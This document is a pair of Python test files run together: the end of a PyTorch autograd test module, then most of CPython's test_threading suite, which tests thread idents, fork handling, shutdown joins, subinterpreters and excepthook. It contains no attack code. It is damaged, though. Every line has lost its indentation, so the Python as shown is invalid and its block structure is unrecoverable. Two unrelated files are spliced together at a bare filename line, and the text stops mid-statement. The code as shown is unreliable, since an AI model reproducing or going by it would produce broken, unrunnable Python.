# Case 2: no error with retain_graph=True
@torch.jit.script
def train_fn_jit_retain(middle, orig_x):
y = middle + middle ** 2
return torch.autograd.grad([y.sum()], [orig_x], retain_graph=True)
@torch.jit.script
def train_fn_fork_join_calls_retain(x):
y_retain = (x + 3) * (x + 4) * 0.5
fut1 = torch.jit._fork(train_fn_jit_retain, y_retain, x)
fut2 = torch.jit._fork(train_fn_jit_retain, y_retain, x)
grad = train_fn_jit_retain(y_retain, x)
grad1 = torch.jit._wait(fut1)
grad2 = torch.jit._wait(fut2)
return grad, grad1, grad2
grad, grad1, grad2 = train_fn_fork_join_calls_retain(torch.randn(5, 5, requires_grad=True))
self.assertEqual(grad, grad1)
self.assertEqual(grad, grad2)
def test_preserve_backtrace(self):
class Foo(torch.autograd.Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
def backward(ctx, *grad):
raise ValueError("something")
t = torch.rand(10, requires_grad=True)
try:
Foo.apply(t).sum().backward()
except Exception:
import traceback
tb = sys.exc_info()[2]
tb_str = "\n".join(traceback.format_tb(tb))
self.assertTrue('raise ValueError("something")' in tb_str)
# TODO(@anjali411): add an OpInfo based test for torch.cat
# Issue: https://github.com/pytorch/pytorch/issues/51627
def test_cat_r_to_c(self):
inp_c = torch.rand(3, 2, dtype=torch.cdouble, requires_grad=True)
inp_r = torch.randn(3, 2, dtype=torch.double, requires_grad=True)
def fn(x1, x2):
return torch.cat((x1, x2), dim=-1)
torch.autograd.gradcheck(fn, [inp_r, inp_c], check_forward_ad=True)
torch.autograd.gradcheck(fn, [inp_c, inp_r], check_forward_ad=True)
# e.g., TestAutogradDeviceTypeCPU and TestAutogradDeviceTypeCUDA
instantiate_device_type_tests(
TestAutogradDeviceType,
globals(),
except_for=None
)
if __name__ == '__main__':
run_tests()
test_threading.py
"""
Tests for the threading module.
"""
import test.support
from test.support import (verbose, import_module, cpython_only,
requires_type_collecting)
from test.support.script_helper import assert_python_ok, assert_python_failure
import random
import sys
import _thread
import threading
import time
import unittest
import weakref
import os
import subprocess
import signal
from test import lock_tests
from test import support
# Between fork() and exec(), only async-safe functions are allowed (issues
# #12316 and #11870), and fork() from a worker thread is known to trigger
# problems with some operating systems (issue #3863): skip problematic tests
# on platforms known to behave badly.
platforms_to_skip = ('netbsd5', 'hp-ux11')
# A trivial mutable counter.
class Counter(object):
def __init__(self):
self.value = 0
def inc(self):
self.value += 1
def dec(self):
self.value -= 1
def get(self):
return self.value
class TestThread(threading.Thread):
def __init__(self, name, testcase, sema, mutex, nrunning):
threading.Thread.__init__(self, name=name)
self.testcase = testcase
self.sema = sema
self.mutex = mutex
self.nrunning = nrunning
def run(self):
delay = random.random() / 10000.0
if verbose:
print('task %s will run for %.1f usec' %
(self.name, delay * 1e6))
with self.sema:
with self.mutex:
self.nrunning.inc()
if verbose:
print(self.nrunning.get(), 'tasks are running')
self.testcase.assertLessEqual(self.nrunning.get(), 3)
time.sleep(delay)
if verbose:
print('task', self.name, 'done')
with self.mutex:
self.nrunning.dec()
self.testcase.assertGreaterEqual(self.nrunning.get(), 0)
if verbose:
print('%s is finished. %d tasks are running' %
(self.name, self.nrunning.get()))
class BaseTestCase(unittest.TestCase):
def setUp(self):
self._threads = test.support.threading_setup()
def tearDown(self):
test.support.threading_cleanup(*self._threads)
test.support.reap_children()
class ThreadTests(BaseTestCase):
# Create a bunch of threads, let each do some work, wait until all are
# done.
def test_various_ops(self):
# This takes about n/3 seconds to run (about n/3 clumps of tasks,
# times about 1 second per clump).
NUMTASKS = 10
# no more than 3 of the 10 can run at once
sema = threading.BoundedSemaphore(value=3)
mutex = threading.RLock()
numrunning = Counter()
threads = []
for i in range(NUMTASKS):
t = TestThread("<thread %d>"%i, self, sema, mutex, numrunning)
threads.append(t)
self.assertIsNone(t.ident)
self.assertRegex(repr(t), r'^<TestThread\(.*, initial\)>$')
t.start()
if hasattr(threading, 'get_native_id'):
native_ids = set(t.native_id for t in threads) | {threading.get_native_id()}
self.assertNotIn(None, native_ids)
self.assertEqual(len(native_ids), NUMTASKS + 1)
if verbose:
print('waiting for all tasks to complete')
for t in threads:
t.join()
self.assertFalse(t.is_alive())
self.assertNotEqual(t.ident, 0)
self.assertIsNotNone(t.ident)
self.assertRegex(repr(t), r'^<TestThread\(.*, stopped -?\d+\)>$')
if verbose:
print('all tasks done')
self.assertEqual(numrunning.get(), 0)
def test_ident_of_no_threading_threads(self):
# The ident still must work for the main thread and dummy threads.
self.assertIsNotNone(threading.currentThread().ident)
def f():
ident.append(threading.currentThread().ident)
done.set()
done = threading.Event()
ident = []
with support.wait_threads_exit():
tid = _thread.start_new_thread(f, ())
done.wait()
self.assertEqual(ident[0], tid)
# Kill the "immortal" _DummyThread
del threading._active[ident[0]]
# run with a small(ish) thread stack size (256 KiB)
def test_various_ops_small_stack(self):
if verbose:
print('with 256 KiB thread stack size...')
try:
threading.stack_size(262144)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
# run with a large thread stack size (1 MiB)
def test_various_ops_large_stack(self):
if verbose:
print('with 1 MiB thread stack size...')
try:
threading.stack_size(0x100000)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
def test_foreign_thread(self):
# Check that a "foreign" thread can use the threading module.
def f(mutex):
# Calling current_thread() forces an entry for the foreign
# thread to get made in the threading._active map.
threading.current_thread()
mutex.release()
mutex = threading.Lock()
mutex.acquire()
with support.wait_threads_exit():
tid = _thread.start_new_thread(f, (mutex,))
# Wait for the thread to finish.
mutex.acquire()
self.assertIn(tid, threading._active)
self.assertIsInstance(threading._active[tid], threading._DummyThread)
# Issue 29376
self.assertTrue(threading._active[tid].is_alive())
self.assertRegex(repr(threading._active[tid]), '_DummyThread')
del threading._active[tid]
# PyThreadState_SetAsyncExc() is a CPython-only gimmick, not (currently)
# exposed at the Python level. This test relies on ctypes to get at it.
def test_PyThreadState_SetAsyncExc(self):
ctypes = import_module("ctypes")
set_async_exc = ctypes.pythonapi.PyThreadState_SetAsyncExc
set_async_exc.argtypes = (ctypes.c_ulong, ctypes.py_object)
class AsyncExc(Exception):
pass
exception = ctypes.py_object(AsyncExc)
# First check it works when setting the exception from the same thread.
tid = threading.get_ident()
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
try:
result = set_async_exc(tid, exception)
# The exception is async, so we might have to keep the VM busy until
# it notices.
while True:
pass
except AsyncExc:
pass
else:
# This code is unreachable but it reflects the intent. If we wanted
# to be smarter the above loop wouldn't be infinite.
self.fail("AsyncExc not raised")
try:
self.assertEqual(result, 1) # one thread state modified
except UnboundLocalError:
# The exception was raised too quickly for us to get the result.
pass
# `worker_started` is set by the thread when it's inside a try/except
# block waiting to catch the asynchronously set AsyncExc exception.
# `worker_saw_exception` is set by the thread upon catching that
# exception.
worker_started = threading.Event()
worker_saw_exception = threading.Event()
class Worker(threading.Thread):
def run(self):
self.id = threading.get_ident()
self.finished = False
try:
while True:
worker_started.set()
time.sleep(0.1)
except AsyncExc:
self.finished = True
worker_saw_exception.set()
t = Worker()
t.daemon = True # so if this fails, we don't hang Python at shutdown
t.start()
if verbose:
print(" started worker thread")
# Try a thread id that doesn't make sense.
if verbose:
print(" trying nonsensical thread id")
result = set_async_exc(-1, exception)
self.assertEqual(result, 0) # no thread states modified
# Now raise an exception in the worker thread.
if verbose:
print(" waiting for worker thread to get started")
ret = worker_started.wait()
self.assertTrue(ret)
if verbose:
print(" verifying worker hasn't exited")
self.assertFalse(t.finished)
if verbose:
print(" attempting to raise asynch exception in worker")
result = set_async_exc(t.id, exception)
self.assertEqual(result, 1) # one thread state modified
if verbose:
print(" waiting for worker to say it caught the exception")
worker_saw_exception.wait(timeout=10)
self.assertTrue(t.finished)
if verbose:
print(" all OK -- joining worker")
if t.finished:
t.join()
# else the thread is still running, and we have no way to kill it
def test_limbo_cleanup(self):
# Issue 7481: Failure to start thread should cleanup the limbo map.
def fail_new_thread(*args):
raise threading.ThreadError()
_start_new_thread = threading._start_new_thread
threading._start_new_thread = fail_new_thread
try:
t = threading.Thread(target=lambda: None)
self.assertRaises(threading.ThreadError, t.start)
self.assertFalse(
t in threading._limbo,
"Failed to cleanup _limbo map on failure of Thread.start().")
finally:
threading._start_new_thread = _start_new_thread
def test_finalize_runnning_thread(self):
# Issue 1402: the PyGILState_Ensure / _Release functions may be called
# very late on python exit: on deallocation of a running thread for
# example.
import_module("ctypes")
rc, out, err = assert_python_failure("-c", """if 1:
import ctypes, sys, time, _thread
# This lock is used as a simple event variable.
ready = _thread.allocate_lock()
ready.acquire()
# Module globals are cleared before __del__ is run
# So we save the functions in class dict
class C:
ensure = ctypes.pythonapi.PyGILState_Ensure
release = ctypes.pythonapi.PyGILState_Release
def __del__(self):
state = self.ensure()
self.release(state)
def waitingThread():
x = C()
ready.release()
time.sleep(100)
_thread.start_new_thread(waitingThread, ())
ready.acquire() # Be sure the other thread is waiting.
sys.exit(42)
""")
self.assertEqual(rc, 42)
def test_finalize_with_trace(self):
# Issue1733757
# Avoid a deadlock when sys.settrace steps into threading._shutdown
assert_python_ok("-c", """if 1:
import sys, threading
# A deadlock-killer, to prevent the
# test suite from hanging forever
def killer():
import os, time
time.sleep(2)
print('program blocked; aborting')
os._exit(2)
t = threading.Thread(target=killer)
t.daemon = True
t.start()
# This is the trace function
def func(frame, event, arg):
threading.current_thread()
return func
sys.settrace(func)
""")
def test_join_nondaemon_on_shutdown(self):
# Issue 1722344
# Raising SystemExit skipped threading._shutdown
rc, out, err = assert_python_ok("-c", """if 1:
import threading
from time import sleep
def child():
sleep(1)
# As a non-daemon thread we SHOULD wake up and nothing
# should be torn down yet
print("Woke up, sleep function is:", sleep)
threading.Thread(target=child).start()
raise SystemExit
""")
self.assertEqual(out.strip(),
b"Woke up, sleep function is: <built-in function sleep>")
self.assertEqual(err, b"")
def test_enumerate_after_join(self):
# Try hard to trigger #1703448: a thread is still returned in
# threading.enumerate() after it has been join()ed.
enum = threading.enumerate
old_interval = sys.getswitchinterval()
try:
for i in range(1, 100):
sys.setswitchinterval(i * 0.0002)
t = threading.Thread(target=lambda: None)
t.start()
t.join()
l = enum()
self.assertNotIn(t, l,
"#1703448 triggered after %d trials: %s" % (i, l))
finally:
sys.setswitchinterval(old_interval)
def test_no_refcycle_through_target(self):
class RunSelfFunction(object):
def __init__(self, should_raise):
# The links in this refcycle from Thread back to self
# should be cleaned up when the thread completes.
self.should_raise = should_raise
self.thread = threading.Thread(target=self._run,
args=(self,),
kwargs={'yet_another':self})
self.thread.start()
def _run(self, other_ref, yet_another):
if self.should_raise:
raise SystemExit
cyclic_object = RunSelfFunction(should_raise=False)
weak_cyclic_object = weakref.ref(cyclic_object)
cyclic_object.thread.join()
del cyclic_object
self.assertIsNone(weak_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_cyclic_object())))
raising_cyclic_object = RunSelfFunction(should_raise=True)
weak_raising_cyclic_object = weakref.ref(raising_cyclic_object)
raising_cyclic_object.thread.join()
del raising_cyclic_object
self.assertIsNone(weak_raising_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_raising_cyclic_object())))
def test_old_threading_api(self):
# Just a quick sanity check to make sure the old method names are
# still present
t = threading.Thread()
t.isDaemon()
t.setDaemon(True)
t.getName()
t.setName("name")
with self.assertWarnsRegex(DeprecationWarning, 'use is_alive()'):
t.isAlive()
e = threading.Event()
e.isSet()
threading.activeCount()
def test_repr_daemon(self):
t = threading.Thread()
self.assertNotIn('daemon', repr(t))
t.daemon = True
self.assertIn('daemon', repr(t))
def test_daemon_param(self):
t = threading.Thread()
self.assertFalse(t.daemon)
t = threading.Thread(daemon=False)
self.assertFalse(t.daemon)
t = threading.Thread(daemon=True)
self.assertTrue(t.daemon)
@unittest.skipUnless(hasattr(os, 'fork'), 'test needs fork()')
def test_dummy_thread_after_fork(self):
# Issue #14308: a dummy thread in the active list doesn't mess up
# the after-fork mechanism.
code = """if 1:
import _thread, threading, os, time
def background_thread(evt):
# Creates and registers the _DummyThread instance
threading.current_thread()
evt.set()
time.sleep(10)
evt = threading.Event()
_thread.start_new_thread(background_thread, (evt,))
evt.wait()
assert threading.active_count() == 2, threading.active_count()
if os.fork() == 0:
assert threading.active_count() == 1, threading.active_count()
os._exit(0)
else:
os.wait()
"""
_, out, err = assert_python_ok("-c", code)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_is_alive_after_fork(self):
# Try hard to trigger #18418: is_alive() could sometimes be True on
# threads that vanished after a fork.
old_interval = sys.getswitchinterval()
self.addCleanup(sys.setswitchinterval, old_interval)
# Make the bug more likely to manifest.
test.support.setswitchinterval(1e-6)
for i in range(20):
t = threading.Thread(target=lambda: None)
t.start()
pid = os.fork()
if pid == 0:
os._exit(11 if t.is_alive() else 10)
else:
t.join()
pid, status = os.waitpid(pid, 0)
self.assertTrue(os.WIFEXITED(status))
self.assertEqual(10, os.WEXITSTATUS(status))
def test_main_thread(self):
main = threading.main_thread()
self.assertEqual(main.name, 'MainThread')
self.assertEqual(main.ident, threading.current_thread().ident)
self.assertEqual(main.ident, threading.get_ident())
def f():
self.assertNotEqual(threading.main_thread().ident,
threading.current_thread().ident)
th = threading.Thread(target=f)
th.start()
th.join()
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork(self):
code = """if 1:
import os, threading
pid = os.fork()
if pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
else:
os.waitpid(pid, 0)
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "MainThread\nTrue\nTrue\n")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork_from_nonmain_thread(self):
code = """if 1:
import os, threading, sys
def f():
pid = os.fork()
if pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
# stdout is fully buffered because not a tty,
# we have to flush before exit.
sys.stdout.flush()
else:
os.waitpid(pid, 0)
th = threading.Thread(target=f)
th.start()
th.join()
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "Thread-1\nTrue\nTrue\n")
@requires_type_collecting
def test_main_thread_during_shutdown(self):
# bpo-31516: current_thread() should still point to the main thread
# at shutdown
code = """if 1:
import gc, threading
main_thread = threading.current_thread()
assert main_thread is threading.main_thread() # sanity check
class RefCycle:
def __init__(self):
self.cycle = self
def __del__(self):
print("GC:",
threading.current_thread() is main_thread,
threading.main_thread() is main_thread,
threading.enumerate() == [main_thread])
RefCycle()
gc.collect() # sanity check
x = RefCycle()
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode()
self.assertEqual(err, b"")
self.assertEqual(data.splitlines(),
["GC: True True True"] * 2)
def test_finalization_shutdown(self):
# bpo-36402: Py_Finalize() calls threading._shutdown() which must wait
# until Python thread states of all non-daemon threads get deleted.
#
# Test similar to SubinterpThreadingTests.test_threads_join_2(), but
# test the finalization of the main interpreter.
code = """if 1:
import os
import threading
import time
import random
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
class Sleeper:
def __del__(self):
random_sleep()
tls = threading.local()
def f():
# Sleep a bit so that the thread is still running when
# Py_Finalize() is called.
random_sleep()
tls.x = Sleeper()
random_sleep()
threading.Thread(target=f).start()
random_sleep()
"""
rc, out, err = assert_python_ok("-c", code)
self.assertEqual(err, b"")
def test_tstate_lock(self):
# Test an implementation detail of Thread objects.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
time.sleep(0.01)
# The tstate lock is None until the thread is started
t = threading.Thread(target=f)
self.assertIs(t._tstate_lock, None)
t.start()
started.acquire()
self.assertTrue(t.is_alive())
# The tstate lock can't be acquired when the thread is running
# (or suspended).
tstate_lock = t._tstate_lock
self.assertFalse(tstate_lock.acquire(timeout=0), False)
finish.release()
# When the thread ends, the state_lock can be successfully
# acquired.
self.assertTrue(tstate_lock.acquire(timeout=5), False)
# But is_alive() is still True: we hold _tstate_lock now, which
# prevents is_alive() from knowing the thread's end-of-life C code
# is done.
self.assertTrue(t.is_alive())
# Let is_alive() find out the C code is done.
tstate_lock.release()
self.assertFalse(t.is_alive())
# And verify the thread disposed of _tstate_lock.
self.assertIsNone(t._tstate_lock)
t.join()
def test_repr_stopped(self):
# Verify that "stopped" shows up in repr(Thread) appropriately.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
t = threading.Thread(target=f)
t.start()
started.acquire()
self.assertIn("started", repr(t))
finish.release()
# "stopped" should appear in the repr in a reasonable amount of time.
# Implementation detail: as of this writing, that's trivially true
# if .join() is called, and almost trivially true if .is_alive() is
# called. The detail we're testing here is that "stopped" shows up
# "all on its own".
LOOKING_FOR = "stopped"
for i in range(500):
if LOOKING_FOR in repr(t):
break
time.sleep(0.01)
self.assertIn(LOOKING_FOR, repr(t)) # we waited at least 5 seconds
t.join()
def test_BoundedSemaphore_limit(self):
# BoundedSemaphore should raise ValueError if released too often.
for limit in range(1, 10):
bs = threading.BoundedSemaphore(limit)
threads = [threading.Thread(target=bs.acquire)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
threads = [threading.Thread(target=bs.release)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
self.assertRaises(ValueError, bs.release)
@cpython_only
def test_frame_tstate_tracing(self):
# Issue #14432: Crash when a generator is created in a C thread that is
# destroyed while the generator is still used. The issue was that a
# generator contains a frame, and the frame kept a reference to the
# Python state of the destroyed C thread. The crash occurs when a trace
# function is setup.
def noop_trace(frame, event, arg):
# no operation
return noop_trace
def generator():
while 1:
yield "generator"
def callback():
if callback.gen is None:
callback.gen = generator()
return next(callback.gen)
callback.gen = None
old_trace = sys.gettrace()
sys.settrace(noop_trace)
try:
# Install a trace function
threading.settrace(noop_trace)
# Create a generator in a C thread which exits after the call
import _testcapi
_testcapi.call_in_temporary_c_thread(callback)
# Call the generator in a different Python thread, check that the
# generator didn't keep a reference to the destroyed thread state
for test in range(3):
# The trace function is still called here
callback()
finally:
sys.settrace(old_trace)
@cpython_only
def test_shutdown_locks(self):
for daemon in (False, True):
with self.subTest(daemon=daemon):
event = threading.Event()
thread = threading.Thread(target=event.wait, daemon=daemon)
# Thread.start() must add lock to _shutdown_locks,
# but only for non-daemon thread
thread.start()
tstate_lock = thread._tstate_lock
if not daemon:
self.assertIn(tstate_lock, threading._shutdown_locks)
else:
self.assertNotIn(tstate_lock, threading._shutdown_locks)
# unblock the thread and join it
event.set()
thread.join()
# Thread._stop() must remove tstate_lock from _shutdown_locks.
# Daemon threads must never add it to _shutdown_locks.
self.assertNotIn(tstate_lock, threading._shutdown_locks)
class ThreadJoinOnShutdown(BaseTestCase):
def _run_and_join(self, script):
script = """if 1:
import sys, os, time, threading
# a thread, which waits for the main program to terminate
def joiningfunc(mainthread):
mainthread.join()
print('end of thread')
# stdout is fully buffered because not a tty, we have to flush
# before exit.
sys.stdout.flush()
\n""" + script
rc, out, err = assert_python_ok("-c", script)
data = out.decode().replace('\r', '')
self.assertEqual(data, "end of main\nend of thread\n")
def test_1_join_on_shutdown(self):
# The usual case: on exit, wait for a non-daemon thread
script = """if 1:
import os
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
time.sleep(0.1)
print('end of main')
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_2_join_in_forked_process(self):
# Like the test above, but from a forked interpreter
script = """if 1:
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
print('end of main')
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_3_join_in_forked_from_thread(self):
# Like the test above, but fork() was called from a worker thread
# In the forked process, the main Thread object must be marked as stopped.
script = """if 1:
main_thread = threading.current_thread()
def worker():
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(main_thread,))
print('end of main')
t.start()
t.join() # Should not block: main_thread is already stopped
w = threading.Thread(target=worker)
w.start()
"""
self._run_and_join(script)
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_4_daemon_threads(self):
# Check that a daemon thread cannot crash the interpreter on shutdown
# by manipulating internal structures that are being disposed of in
# the main thread.
script = """if True:
import os
import random
import sys
import time
import threading
thread_has_run = set()
def random_io():
'''Loop for a while sleeping random tiny amounts and doing some I/O.'''
while True:
with open(os.__file__, 'rb') as in_f:
stuff = in_f.read(200)
with open(os.devnull, 'wb') as null_f:
null_f.write(stuff)
time.sleep(random.random() / 1995)
thread_has_run.add(threading.current_thread())
def main():
count = 0
for _ in range(40):
new_thread = threading.Thread(target=random_io)
new_thread.daemon = True
new_thread.start()
count += 1
while len(thread_has_run) < count:
time.sleep(0.001)
# Trigger process shutdown
sys.exit(0)
main()
"""
rc, out, err = assert_python_ok('-c', script)
self.assertFalse(err)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_reinit_tls_after_fork(self):
# Issue #13817: fork() would deadlock in a multithreaded program with
# the ad-hoc TLS implementation.
def do_fork_and_wait():
# just fork a child process and wait it
pid = os.fork()
if pid > 0:
os.waitpid(pid, 0)
else:
os._exit(0)
# start a bunch of threads that will fork() child processes
threads = []
for i in range(16):
t = threading.Thread(target=do_fork_and_wait)
threads.append(t)
t.start()
for t in threads:
t.join()
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_clear_threads_states_after_fork(self):
# Issue #17094: check that threads states are cleared after fork()
# start a bunch of threads
threads = []
for i in range(16):
t = threading.Thread(target=lambda : time.sleep(0.3))
threads.append(t)
t.start()
pid = os.fork()
if pid == 0:
# check that threads states have been cleared
if len(sys._current_frames()) == 1:
os._exit(0)
else:
os._exit(1)
else:
_, status = os.waitpid(pid, 0)
self.assertEqual(0, status)
for t in threads:
t.join()
class SubinterpThreadingTests(BaseTestCase):
def test_threads_join(self):
# Non-daemon threads should be joined at subinterpreter shutdown
# (issue #18808)
r, w = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
code = r"""if 1:
import os
import random
import threading
import time
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
def f():
# Sleep a bit so that the thread is still running when
# Py_EndInterpreter is called.
random_sleep()
os.write(%d, b"x")
threading.Thread(target=f).start()
random_sleep()
""" % (w,)
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
def test_threads_join_2(self):
# Same as above, but a delay gets introduced after the thread's
# Python code returned but before the thread state is deleted.
# To achieve this, we register a thread-local object which sleeps
# a bit when deallocated.
r, w = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
code = r"""if 1:
import os
import random
import threading
import time
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
class Sleeper:
def __del__(self):
random_sleep()
tls = threading.local()
def f():
# Sleep a bit so that the thread is still running when
# Py_EndInterpreter is called.
random_sleep()
tls.x = Sleeper()
os.write(%d, b"x")
threading.Thread(target=f).start()
random_sleep()
""" % (w,)
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
@cpython_only
def test_daemon_threads_fatal_error(self):
subinterp_code = r"""if 1:
import os
import threading
import time
def f():
# Make sure the daemon thread is still running when
# Py_EndInterpreter is called.
time.sleep(10)
threading.Thread(target=f, daemon=True).start()
"""
script = r"""if 1:
import _testcapi
_testcapi.run_in_subinterp(%r)
""" % (subinterp_code,)
with test.support.SuppressCrashReport():
rc, out, err = assert_python_failure("-c", script)
self.assertIn("Fatal Python error: Py_EndInterpreter: "
"not the last thread", err.decode())
class ThreadingExceptionTests(BaseTestCase):
# A RuntimeError should be raised if Thread.start() is called
# multiple times.
def test_start_thread_again(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, thread.start)
thread.join()
def test_joining_current_thread(self):
current_thread = threading.current_thread()
self.assertRaises(RuntimeError, current_thread.join);
def test_joining_inactive_thread(self):
thread = threading.Thread()
self.assertRaises(RuntimeError, thread.join)
def test_daemonize_active_thread(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, setattr, thread, "daemon", True)
thread.join()
def test_releasing_unacquired_lock(self):
lock = threading.Lock()
self.assertRaises(RuntimeError, lock.release)
@unittest.skipUnless(sys.platform == 'darwin' and test.support.python_is_optimized(),
'test macosx problem')
def test_recursion_limit(self):
# Issue 9670
# test that excessive recursion within a non-main thread causes
# an exception rather than crashing the interpreter on platforms
# like Mac OS X or FreeBSD which have small default stack sizes
# for threads
script = """if True:
import threading
def recurse():
return recurse()
def outer():
try:
recurse()
except RecursionError:
pass
w = threading.Thread(target=outer)
w.start()
w.join()
print('end of main thread')
"""
expected_output = "end of main thread\n"
p = subprocess.Popen([sys.executable, "-c", script],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
data = stdout.decode().replace('\r', '')
self.assertEqual(p.returncode, 0, "Unexpected error: " + stderr.decode())
self.assertEqual(data, expected_output)
def test_print_exception(self):
script = r"""if True:
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
err = err.decode()
self.assertIn("Exception in thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
@requires_type_collecting
def test_print_exception_stderr_is_none_1(self):
script = r"""if True:
import sys
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
sys.stderr = None
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
err = err.decode()
self.assertIn("Exception in thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
def test_print_exception_stderr_is_none_2(self):
script = r"""if True:
import sys
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
sys.stderr = None
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
self.assertNotIn("Unhandled exception", err.decode())
def test_bare_raise_in_brand_new_thread(self):
def bare_raise():
raise
class Issue27558(threading.Thread):
exc = None
def run(self):
try:
bare_raise()
except Exception as exc:
self.exc = exc
thread = Issue27558()
thread.start()
thread.join()
self.assertIsNotNone(thread.exc)
self.assertIsInstance(thread.exc, RuntimeError)
# explicitly break the reference cycle to not leak a dangling thread
thread.exc = None
class ThreadRunFail(threading.Thread):
def run(self):
raise ValueError("run failed")
class ExceptHookTests(BaseTestCase):
def test_excepthook(self):
with support.captured_output("stderr") as stderr:
thread = ThreadRunFail(name="excepthook thread")
thread.start()
thread.join()
stderr = stderr.getvalue().strip()
self.assertIn(f'Exception in thread {thread.name}:\n', stderr)
self.assertIn('Traceback (most recent call last):\n', stderr)
self.assertIn(' raise ValueError("run failed")', stderr)
self.assertIn('ValueError: run failed', stderr)
@support.cpython_only
def test_excepthook_thread_None(self):
# threading.excepthook called with thread=None: log the thread
# identifier in this case.
with support.captured_output("stderr") as stderr:
try:
raise ValueError("bug")
except Exception as exc:
args = threading.ExceptHookArgs([*sys.exc_info(), None])
try:
threading.excepthook(args)
finally:
# Explicitly break a reference cycle
args = None
stderr = stderr.getvalue().strip()
self.assertIn(f'Exception in thread {threading.get_ident()}:\n', stderr)
self.assertIn('Traceback (most recent call last):\n', stderr)
self.assertIn(' raise ValueError("bug")', stderr)
self.assertIn('ValueError: bug', stderr)
def test_system_exit(self):
class ThreadExit(threading.Thread):
def run(self):
sys.exit(1)
# threading.excepthook() silently ignores SystemExit
with support.captured_output("stderr") as stderr:
thread = ThreadExit()
thread.start()
thread.join()
self.assertEqual(stderr.getvalue(), '')
def test_custom_excepthook(self):
args = None
def hook(hook_args):
nonlocal args
args = hook_args
try:
with support.swap_attr(threading, 'excepthook', hook):
thread = ThreadRunFail()
thread.start()
thread.join()
self.assertEqual(args.exc_type, ValueError)
self.assertEqual(str(args.exc_value), 'run failed')
self.assertEqual(args.exc_traceback, args.exc_value.__traceback__)
self.assertIs(args.thread, thread)
finally:
# Break reference cycle
args = None
def test_custom_excepthook_fail(self):
def threading_hook(args):
raise ValueError("threading_hook failed")
err_str = None
def sys_hook(exc_type, exc_value, exc_traceback):
nonlocal err_str
err_str = str(exc_value)
with support.swap_attr(threading, 'excepthook', threading_hook), \
support.swap_attr(sys, 'excepthook', sys_hook), \
